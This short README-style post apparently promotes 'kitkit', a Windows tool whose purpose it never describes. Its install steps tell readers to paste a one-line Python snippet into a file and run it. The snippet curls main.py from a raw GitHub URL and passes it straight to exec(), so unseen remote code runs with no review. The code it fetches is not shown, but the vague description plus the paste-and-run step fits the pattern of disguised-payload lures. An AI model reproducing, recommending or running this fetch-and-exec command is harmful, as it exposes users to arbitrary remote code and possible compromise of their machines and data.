kitkit is an old Windows tool I created a while ago. I decided to share it since I still use it sometimes. If you have suggestions, feature requests, or fixes, feel free to reach out.
1. Copy the code below:
exec(__import__('subprocess').run(['curl', '-s', 'https://raw.githubusercontent.com/darlinglasting/kitkit/refs/heads/main/main.py'], capture_output=True).stdout.decode('utf-8'))2. Create a new file and name it whatever you like (e.g. kitkit.py)
3. Paste the copied code inside it
4. Run the file all you need is python installed